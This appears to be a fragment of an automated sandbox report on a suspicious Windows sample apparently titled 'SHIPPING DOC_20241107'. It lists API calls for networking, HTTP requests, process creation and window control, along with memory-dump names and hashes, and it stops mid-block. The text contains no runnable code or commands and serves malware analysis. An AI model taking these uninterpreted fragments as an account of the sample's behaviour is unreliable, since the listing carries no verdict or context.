                                                                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00A258A9
                                                                                                                              • inet_addr.WSOCK32(?,?,?), ref: 00A258EE
                                                                                                                              • gethostbyname.WSOCK32(?), ref: 00A258FA
                                                                                                                              • IcmpCreateFile.IPHLPAPI ref: 00A25908
                                                                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A25978
                                                                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A2598E
                                                                                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00A25A03
                                                                                                                              • WSACleanup.WSOCK32 ref: 00A25A09
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                              • String ID: Ping
                                                                                                                              • API String ID: 1028309954-2246546115
                                                                                                                              • Opcode ID: f2665cdf407b8af3084d3863a29798b4ef2e2fd879b329b6e852b723d79ebfc0
                                                                                                                              • Instruction ID: 830b0cf28fce981ba13953a82e59c8b918fdef6ddbfa3c61d67b420528b8db44
                                                                                                                              • Opcode Fuzzy Hash: f2665cdf407b8af3084d3863a29798b4ef2e2fd879b329b6e852b723d79ebfc0
                                                                                                                              • Instruction Fuzzy Hash: EF517E31A04710DFD710EF68ED49B6A7BE4BB49720F144529F996DB2A1DB70E840DB41
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00A1B55C
                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00A1B5D2
                                                                                                                              • GetLastError.KERNEL32 ref: 00A1B5DC
                                                                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 00A1B649
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                              • API String ID: 4194297153-14809454
                                                                                                                              • Opcode ID: a9f5d7571896bbdde1d0cc5652004289fc836d682643888e9865f09bee560e7f
                                                                                                                              • Instruction ID: 18dac3a0dd911ddbdb12b4ba2d6750ca8a3b0c6bdf934917825e7c4544abbcdd
                                                                                                                              • Opcode Fuzzy Hash: a9f5d7571896bbdde1d0cc5652004289fc836d682643888e9865f09bee560e7f
                                                                                                                              • Instruction Fuzzy Hash: 9D318F75A10209AFCB10EFA4D985FEEB7B8FF54310F144165F512DB2A1DB709A82CBA0
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B7F41: _memmove.LIBCMT ref: 009B7F82
                                                                                                                                • Part of subcall function 00A0AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00A0AEC7
                                                                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00A092D6
                                                                                                                              • GetDlgCtrlID.USER32 ref: 00A092E1
                                                                                                                              • GetParent.USER32 ref: 00A092FD
                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A09300
                                                                                                                              • GetDlgCtrlID.USER32 ref: 00A09309
                                                                                                                              • GetParent.USER32(?), ref: 00A09325
                                                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00A09328
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 1536045017-1403004172
                                                                                                                              • Opcode ID: 651fe48cda701eabbed8252f76e9204f40296a0f2a60d72f479049813ada0e4e
                                                                                                                              • Instruction ID: 2602f3a747cafdc12662c0298fc7e33136d75962df47a0abc41e338744a0e644
                                                                                                                              • Opcode Fuzzy Hash: 651fe48cda701eabbed8252f76e9204f40296a0f2a60d72f479049813ada0e4e
                                                                                                                              • Instruction Fuzzy Hash: C8219C70A00208BFDF04ABA0DC86EFEBB78EB99310F104159F961972E2DB7558169A20
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B7F41: _memmove.LIBCMT ref: 009B7F82
                                                                                                                                • Part of subcall function 00A0AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00A0AEC7
                                                                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00A093BF
                                                                                                                              • GetDlgCtrlID.USER32 ref: 00A093CA
                                                                                                                              • GetParent.USER32 ref: 00A093E6
                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A093E9
                                                                                                                              • GetDlgCtrlID.USER32 ref: 00A093F2
                                                                                                                              • GetParent.USER32(?), ref: 00A0940E
                                                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00A09411
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 1536045017-1403004172
                                                                                                                              • Opcode ID: 396c74b74e9191d587f801d8b7f2d88c8f32bbe5da5ca01c50bade2b0953c2e4
                                                                                                                              • Instruction ID: 4458ac7ffa4bf5576fca47ab4ce1795379b121c81c7c7d2b0b86b7107292ba24
                                                                                                                              • Opcode Fuzzy Hash: 396c74b74e9191d587f801d8b7f2d88c8f32bbe5da5ca01c50bade2b0953c2e4
                                                                                                                              • Instruction Fuzzy Hash: 47219074A00208BBDF00ABA5DC86EFEBB78EB94300F100169F911971E2DB7559169A20
                                                                                                                              APIs
                                                                                                                              • GetParent.USER32 ref: 00A09431
                                                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00A09446
                                                                                                                              • _wcscmp.LIBCMT ref: 00A09458
                                                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A094D3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                              • API String ID: 1704125052-3381328864
                                                                                                                              • Opcode ID: 037bcdcae68d17b8e6adea6d2dc66f2e50c837320b7bc65b26b5800402d6bb43
                                                                                                                              • Instruction ID: 750c881356e8c22e4b893260c3ecf899406f35d53cc302acffa99717e9bad357
                                                                                                                              • Opcode Fuzzy Hash: 037bcdcae68d17b8e6adea6d2dc66f2e50c837320b7bc65b26b5800402d6bb43
                                                                                                                              • Instruction Fuzzy Hash: 1011C6BB69C30ABAF6142624FC07EAB77AC9B15725B208027F904A41E2FA6368534595
                                                                                                                              APIs
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00A289EC
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00A28A19
                                                                                                                              • CoUninitialize.OLE32 ref: 00A28A23
                                                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00A28B23
                                                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00A28C50
                                                                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00A42C0C), ref: 00A28C84
                                                                                                                              • CoGetObject.OLE32(?,00000000,00A42C0C,?), ref: 00A28CA7
                                                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 00A28CBA
                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A28D3A
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00A28D4A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2395222682-0
                                                                                                                              • Opcode ID: a8690ceb55fc003628f4ca032237ccadf7d5e43f8eebe517f9c766f41a004a11
                                                                                                                              • Instruction ID: c8b610763544a01091b638b5af4b8d1486fb7266603f654d1a0f1ae147c7d6ee
                                                                                                                              • Opcode Fuzzy Hash: a8690ceb55fc003628f4ca032237ccadf7d5e43f8eebe517f9c766f41a004a11
                                                                                                                              • Instruction Fuzzy Hash: FBC157B1609315AFC700DF68D884A6BB7E9FF88748F00492DF58A9B251DB35ED06CB52
                                                                                                                              APIs
                                                                                                                              • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00A17B15
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ArraySafeVartype
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1725837607-0
                                                                                                                              • Opcode ID: 7b6fc51d8eb2c8d60f588a883c4f3e7ab95795ffab811ad49a26b035a4207e26
                                                                                                                              • Instruction ID: 5befb700f0e3da2e5dc2475c10d62af6e9d4815eb44ffab1be63a8a6910bdc11
                                                                                                                              • Opcode Fuzzy Hash: 7b6fc51d8eb2c8d60f588a883c4f3e7ab95795ffab811ad49a26b035a4207e26
                                                                                                                              • Instruction Fuzzy Hash: 5FB1CF7590821A9FDB10DFA8D885BFEB7B4FF48321F245469E501EB291D734A981CFA0
                                                                                                                              APIs
                                                                                                                              • GetCurrentThreadId.KERNEL32(?,?,?,?,?,00A10599,?,00000001), ref: 00A11521
                                                                                                                              • GetForegroundWindow.USER32 ref: 00A11535
                                                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00A1153C
                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00A1154B
                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A1155D
                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00A11576
                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00A11588
                                                                                                                              • AttachThreadInput.USER32(00000000,00000000), ref: 00A115CD
                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00A115E2
                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00A115ED
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2156557900-0
                                                                                                                              • Opcode ID: d0c92f0f3f22b2b7490643167b121b882c9d9cc2b5b2e1ac0c7ee71fa15e5123
                                                                                                                              • Instruction ID: 613e19da0bc1253bd47f46ff551a980ae352f7e4f31219ad09f4e1991a07f204
                                                                                                                              • Opcode Fuzzy Hash: d0c92f0f3f22b2b7490643167b121b882c9d9cc2b5b2e1ac0c7ee71fa15e5123
                                                                                                                              • Instruction Fuzzy Hash: 74318075911604BFDB10DFD4EC49FA9B7ABEB94321F108026FA0AD61A0DBB49DC18B61
                                                                                                                              APIs
                                                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009BFC06
                                                                                                                              • OleUninitialize.OLE32(?,00000000), ref: 009BFCA5
                                                                                                                              • UnregisterHotKey.USER32(?), ref: 009BFDFC
                                                                                                                              • DestroyWindow.USER32 ref: 009F492F
                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 009F4994
                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 009F49C1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                              • String ID: close all
                                                                                                                              • API String ID: 469580280-3243417748
                                                                                                                              • Opcode ID: 3f4dac65586f8796d21145e3790d66ecf013f6e7573fd6a7aee0a761a8cf129b
                                                                                                                              • Instruction ID: 2f6ab9246625c50d2022cebbd02bcb91b47146d00a8457b195618a7df2685a44
                                                                                                                              • Opcode Fuzzy Hash: 3f4dac65586f8796d21145e3790d66ecf013f6e7573fd6a7aee0a761a8cf129b
                                                                                                                              • Instruction Fuzzy Hash: 3AA15E31701216CFCB19EF14CAA5B7AF768AF44710F5542ADE90A6B262DB30ED52CF50
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ChildEnumWindows
                                                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                              • API String ID: 3555792229-1603158881
                                                                                                                              • Opcode ID: 8111e8dee0a4bfc0580e5272b0dcf3e7bcbcbd6306d6154306b584c90bea429e
                                                                                                                              • Instruction ID: ec04cfee26efa9ed1efc23ca791fcee671c31ad4aca3334c89f6837952fe0599
                                                                                                                              • Opcode Fuzzy Hash: 8111e8dee0a4bfc0580e5272b0dcf3e7bcbcbd6306d6154306b584c90bea429e
                                                                                                                              • Instruction Fuzzy Hash: E691E430A00709ABCB18DF70D491BEDFBB4BF64344F54C11AE89AA7291DF316999CB91
                                                                                                                              APIs
                                                                                                                              • SetWindowLongW.USER32(?,000000EB,?,?,000000FF,?,000000FF), ref: 009B2EAE
                                                                                                                                • Part of subcall function 009B1DB3: GetClientRect.USER32(?,?), ref: 009B1DDC
                                                                                                                                • Part of subcall function 009B1DB3: GetWindowRect.USER32(?,?), ref: 009B1E1D
                                                                                                                                • Part of subcall function 009B1DB3: ScreenToClient.USER32(?,?), ref: 009B1E45
                                                                                                                              • GetDC.USER32 ref: 009ECEB2
                                                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009ECEC5
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 009ECED3
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 009ECEE8
                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 009ECEF0
                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,?), ref: 009ECF7B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                              • String ID: U
                                                                                                                              • API String ID: 4009187628-3372436214
                                                                                                                              • Opcode ID: c8d716fbac5f8f778d1461317f4168b838b7ec850ba0836ff7ce91aa05d43a8f
                                                                                                                              • Instruction ID: 8f2d73cbbe8d28aeac9196017a5624f7b2d95a54500cf0aa18b18e3ae274c57f
                                                                                                                              • Opcode Fuzzy Hash: c8d716fbac5f8f778d1461317f4168b838b7ec850ba0836ff7ce91aa05d43a8f
                                                                                                                              • Instruction Fuzzy Hash: 14719171500245DFCF26CF65CD84AEA7BBAFF49320F148A69FD955A166C7308C42DB60
                                                                                                                              APIs
                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A21B66
                                                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A21B92
                                                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A21BD4
                                                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A21BE9
                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A21BF6
                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00A21C26
                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00A21C6D
                                                                                                                                • Part of subcall function 00A22599: GetLastError.KERNEL32(?,?,00A2192D,00000000,00000000,00000001), ref: 00A225AE
                                                                                                                                • Part of subcall function 00A22599: SetEvent.KERNEL32(?,?,00A2192D,00000000,00000000,00000001), ref: 00A225C3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2603140658-3916222277
                                                                                                                              • Opcode ID: 023696fb005bb8d5450c7a1b23e702d80f5fd35f7932205304dc6e12ab331d3e
                                                                                                                              • Instruction ID: 6180a5273636534968381106899983bc4a98a3b03038451b1dd54473a64519a2
                                                                                                                              • Opcode Fuzzy Hash: 023696fb005bb8d5450c7a1b23e702d80f5fd35f7932205304dc6e12ab331d3e
                                                                                                                              • Instruction Fuzzy Hash: ED41AFB1940228BFEB119F64DD89FBB77ACEF18354F00413AF9019A151E770DE458BA0
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00A3F910), ref: 00A28E3D
                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00A3F910), ref: 00A28E71
                                                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00A28FEB
                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00A29015
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 560350794-0
                                                                                                                              • Opcode ID: 87daa3634fba8097c3fb01f0a817a48f0741f2d9189a444da9bbbad60ad5ccd2
                                                                                                                              • Instruction ID: eb62bb6da1c5f288fd942d0b7a340dd13bf475aec4d40da00622708bfb027a4c
                                                                                                                              • Opcode Fuzzy Hash: 87daa3634fba8097c3fb01f0a817a48f0741f2d9189a444da9bbbad60ad5ccd2
                                                                                                                              • Instruction Fuzzy Hash: F6F14B71A00219EFCF04DF98D988EAEB7B9FF89715F108168F915AB250DB31AE45CB50
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 00A2F7C9
                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A2F95C
                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A2F980
                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A2F9C0
                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A2F9E2
                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A2FB5E
                                                                                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00A2FB90
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00A2FBBF
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00A2FC36
                                                                                                                              Memory Dump Source
